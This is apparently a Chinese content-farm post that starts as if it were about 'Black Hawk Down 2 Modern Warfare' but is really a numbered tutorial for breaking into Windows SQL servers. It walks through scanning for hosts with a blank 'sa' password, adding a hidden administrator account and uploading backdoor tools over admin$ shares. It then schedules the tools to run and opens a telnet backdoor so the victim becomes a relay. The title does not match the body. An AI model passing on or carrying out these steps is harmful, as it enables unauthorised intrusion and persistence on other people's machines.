大家好,小福来为大家解答以上的问题。黑鹰坠落2现代战争,heiying这个很多人还不知道,现在让我们一起来看看吧!
1、做木马,留后门,他的ip肯定是动态ip,就算是固定的,现在计算机安装的都有杀毒和防火墙,不好进使用的工具:流光IV 启动流光,按Ctrl+R。
2、出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。
3、点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” —— SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。
4、 net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1 net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
5、 下面我们来做跳板: 打开cmd.exe,输入net use \127.0.0.1ipc$ "heiying1" /user:"heiying"命令 显示命令成功完成。
6、 上传srv.exe: copy srv.exe \127.0.0.1admin$system32 上传ntlm.exe: copy ntlm.exe \127.0.0.1admin$system32 启动服务: 首先用net time \127.0.0.1 看看对方主机的时间,(假如回显\127.0.0.1 的本地时间是上午12.00),然后我们用at \2127.0.0.1 12.01 srv.exe命令来启动srv.exe。
7、等一分钟后就可以telnet了。
8、 一分钟后在本机命令提示符中输入: telnet X.X.X.X 99 然后我们要启动NTLM.exe: 在telnet状态下直接输入ntlm回车。
9、 显示:windows 2000 telnet dump,by assassin,all rights reserved.done! 然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。
10、这样,我们的跳板就做好了,简单吧? (上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)。
本文到此分享完毕,希望对大家有所帮助。